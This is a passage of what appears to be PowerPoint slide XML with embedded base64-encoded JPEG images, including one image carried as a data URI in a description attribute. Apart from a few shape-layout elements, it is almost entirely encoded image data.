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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="307975" y="-10128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4" descr="data:image/jpeg;base64,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